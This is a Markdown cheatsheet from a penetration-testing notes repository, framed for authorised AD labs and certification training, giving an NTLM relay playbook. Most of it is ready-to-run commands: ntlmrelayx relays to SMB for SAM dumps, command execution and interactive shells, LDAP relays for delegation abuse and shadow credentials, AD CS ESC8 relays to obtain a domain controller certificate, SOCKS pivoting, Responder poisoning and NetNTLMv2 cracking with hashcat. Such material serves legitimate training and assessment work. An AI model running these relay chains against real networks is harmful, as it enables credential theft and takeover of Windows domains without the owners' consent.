daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ntlm-kerberos-relay.md (7532B)


      1 ---
      2 title: "NTLM & Kerberos Relay"
      3 description: "Coercion and relay attacks: ntlmrelayx/Responder targets, ADCS/LDAP relay and Kerberos relaying."
      4 category: tools
      5 tags: [relay, ntlm, kerberos, coercion]
      6 tools: [ntlmrelayx, Responder, Coercer]
      7 difficulty: advanced
      8 updated: "2026-08-09"
      9 source: "vault:Tools/NTLM-Kerberos-Relay-Cheatsheet.md"
     10 ---
     11 
     12 # NTLM & Kerberos Relay
     13 
     14 > **Context —** HTB / CPTS / authorised AD labs. Tool: Impacket `ntlmrelayx` plus coercion helpers. Flags verified against `ntlmrelayx.py -h` (Impacket v0.13.x). Always re-check on your build.
     15 
     16 Relay playbook for authorised assessments: capture or coerce NTLM authentications, relay to signing-disabled / relay-capable endpoints, optionally escalate via LDAP/AD CS/SOCKS.
     17 
     18 Related notes: Impacket, Certipy, NetExec, BloodHound, Hashcat, Rubeus.
     19 
     20 ---
     21 
     22 ## Summary
     23 
     24 NTLM relay forwards a victim's authentication bytes to a service that accepts them. Classic lab chain: poison or coerce → `ntlmrelayx` listener → dump SAM / LDAP ACL abuse / AD CS enrollment / SOCKS pivot. SMB signing, EPA/channel binding, and Kerberos-only auth are the usual blockers. Use NetExec (`smb --gen-relay-list`) to build target lists.
     25 
     26 > **Danger — authorised-use framing**
     27 > 1. Poisoning and coercion are disruptive — stay inside ROE and lab scope.
     28 > 2. Do not run Responder + `ntlmrelayx` SMB servers on the same port without coordination (`--no-smb-server` patterns).
     29 > 3. Document every coerced host and relay target for the report.
     30 
     31 ---
     32 
     33 ## When Relay Works
     34 
     35 | Condition | Why it matters |
     36 |---|---|
     37 | SMB signing **not required** on target | Unsigned SMB accepts relayed NTLM |
     38 | LDAP/LDAPS signing / channel binding gaps | Enables LDAP relay → ACL / Shadow / DCSync prep |
     39 | HTTP service without proper EPA/CBT | AD CS web enrollment (ESC8), other HTTP NTLM apps |
     40 | Victim authenticates with **NTLM** (not pure Kerberos) | Relay needs NTLM tokens |
     41 | You control listener + have coercion/poison path | No auth → nothing to relay |
     42 
     43 ```bash
     44 # Build relayable SMB targets (NetExec)
     45 nxc smb 10.10.10.0/24 --gen-relay-list relay.txt
     46 ```
     47 
     48 ---
     49 
     50 ## ntlmrelayx Quick Flags
     51 
     52 | Flag | Purpose |
     53 |---|---|
     54 | `-t` / `--target` | Relay destination (host or URL) |
     55 | `-tf` | Targets file |
     56 | `-smb2support` | SMB2 support (almost always needed) |
     57 | `-socks` | Open SOCKS proxy on successful relays |
     58 | `-c COMMAND` | Execute command on successful SMB relay |
     59 | `-e FILE` | Execute binary/export on success |
     60 | `-l LOOTDIR` | Loot directory |
     61 | `-of OUTPUT_FILE` | Hash / output file prefix |
     62 | `--no-smb-server` | Disable incoming SMB server (use with Responder) |
     63 | `--adcs` | AD CS enrollment attack mode |
     64 | `--template` | Certificate template for AD CS relay |
     65 | `--shadow-credentials` | Shadow creds via LDAP relay |
     66 | `--delegate-access` | Resource-based constrained delegation setup |
     67 | `--remove-mic` | MIC removal tricks (CVE-era / legacy targets) |
     68 | `-i` | Interactive shell on success (SMB) |
     69 | `-ip` | Interface IP for servers |
     70 
     71 ---
     72 
     73 ## Core Relay Patterns
     74 
     75 ```bash
     76 # SMB dump against signing-disabled targets
     77 sudo ntlmrelayx.py -tf relay.txt -smb2support
     78 
     79 # Single target + interactive
     80 sudo ntlmrelayx.py -t smb://10.10.10.50 -smb2support -i
     81 
     82 # Run a command on success
     83 sudo ntlmrelayx.py -t 10.10.10.50 -smb2support -c 'whoami'
     84 
     85 # LDAP relay (ACL / escalation options)
     86 sudo ntlmrelayx.py -t ldap://dc.domain.local -smb2support --delegate-access
     87 ```
     88 
     89 > **Command breakdown**
     90 > 1. **-tf relay.txt**: only hosts that failed signing checks.
     91 > 2. **-smb2support**: required for modern Windows.
     92 > 3. **-t ldap://…**: protocol URL selects the relay client module.
     93 > 4. Run coercion or Responder in a second terminal after the listener is up.
     94 
     95 ---
     96 
     97 ## AD CS / Shadow / SOCKS
     98 
     99 ```bash
    100 # ESC8 via ntlmrelayx HTTP → cert enrollment
    101 sudo ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp \
    102   -smb2support --adcs --template DomainController
    103 
    104 # Or use Certipy's dedicated relay (see Certipy sheet)
    105 # certipy relay -target http://ca.domain.local/certsrv/certfnsh.asp
    106 
    107 # Shadow credentials via LDAP relay
    108 sudo ntlmrelayx.py -t ldap://dc.domain.local -smb2support --shadow-credentials \
    109   --shadow-target 'targetcomputer$'
    110 
    111 # SOCKS pivot after successful relays
    112 sudo ntlmrelayx.py -tf relay.txt -smb2support -socks
    113 # then: proxychains nxc smb ... / Impacket with proxy
    114 ```
    115 
    116 ---
    117 
    118 ## Coercion Pointers
    119 
    120 > **Tip — common coercion families (authorised labs)**
    121 > 1. **MS-RPRN / PrinterBug**, **PetitPotam** (MS-EFSRPC), **DFSCoerce**, **ShadowCoerce** — force a host to authenticate to you.
    122 > 2. Point the coerce **listener** at your `ntlmrelayx` / Certipy relay IP.
    123 > 3. Prefer targeting machines whose auth lands on a useful relay sink (DC LDAP, CA HTTP, admin workstation SMB).
    124 > 4. Exact public PoC flags change — verify the tool `-h` in your kit; do not mix untested coerce + relay ports.
    125 
    126 ```text
    127 # Conceptual pattern (tool-specific flags omitted on purpose)
    128 # 1) start relay listener
    129 # 2) coerce VICTIM → http://YOUR_IP/ or smb://YOUR_IP/
    130 # 3) collect loot / SOCKS / PFX
    131 ```
    132 
    133 ---
    134 
    135 ## Kerberos Notes (vs NTLM)
    136 
    137 > **Why "Kerberos relay" is a different problem**
    138 > 1. Classic `ntlmrelayx` chains abuse **NTLM**. Kerberos tickets are service-bound (SPN) and do not relay the same way.
    139 > 2. Some modern techniques abuse Kerberos *delegation* / unconstrained / RBCD / s4u — that is ticket abuse (see Rubeus), not NTLM relay.
    140 > 3. If the environment forces Kerberos and disables NTLM, pivot to RBCD, AD CS, or credential theft instead of Responder.
    141 > 4. LLMNR/NBT-NS poisoning often still yields NetNTLMv2 for Hashcat even when SMB relay is blocked by signing.
    142 
    143 ```bash
    144 # Offline crack path when relay is blocked but capture succeeded
    145 # Responder → Hashcat mode 5600 (NetNTLMv2)
    146 hashcat -m 5600 capture.txt wordlist -r rules/best64.rule
    147 ```
    148 
    149 ---
    150 
    151 ## Practical Recipes
    152 
    153 ```bash
    154 # A) Enumerate → relay SMB → SAM
    155 nxc smb 10.10.10.0/24 --gen-relay-list relay.txt
    156 sudo ntlmrelayx.py -tf relay.txt -smb2support -l loot
    157 
    158 # B) Coerce DC → AD CS HTTP → DC cert → auth
    159 sudo ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
    160 # coerce dc$ → attacker
    161 # certipy auth -pfx dc.pfx ...
    162 
    163 # C) Responder + relay without SMB port clash
    164 sudo responder -I tun0 -dwv   # or disable SMB/HTTP in Responder.conf
    165 sudo ntlmrelayx.py -tf relay.txt -smb2support --no-smb-server
    166 ```
    167 
    168 ---
    169 
    170 ## Troubleshooting & Gotchas
    171 
    172 > **Common failures**
    173 > 1. **Port already in use**: Responder and ntlmrelayx both want 445/80 — use `--no-smb-server` / edit Responder.conf.
    174 > 2. **Signing required**: remove target from `relay.txt`; fall back to hash cracking.
    175 > 3. **Multi-relay exhausted**: try `--keep-relaying` / fresh coerce; some modes one-shot a session.
    176 > 4. **LDAP channel binding**: LDAPS relay options may fail on hardened DCs — check error text.
    177 
    178 ---
    179 
    180 ## Lessons Learned
    181 
    182 1. Generate relay lists first; blind `-t` against signed SMB wastes coerces.
    183 2. Separate poison, coerce, and relay into clear terminal roles.
    184 3. AD CS relay often beats SMB dumps for domain-class access.
    185 4. SOCKS turns one successful session into a reusable pivot — protect that port.
    186 5. If NTLM is dead, stop forcing relay — switch to Kerberos/AD CS/RBCD tradecraft.
    187 
    188 ---
    189 
    190 ## References
    191 
    192 1. Impacket ntlmrelayx — https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py
    193 2. NetExec wiki — https://www.netexec.wiki/
    194 3. HackTricks — NTLM relay
    195 4. Microsoft — NTLM overview
    196 5. MITRE ATT&CK — Man-in-the-Middle (T1557)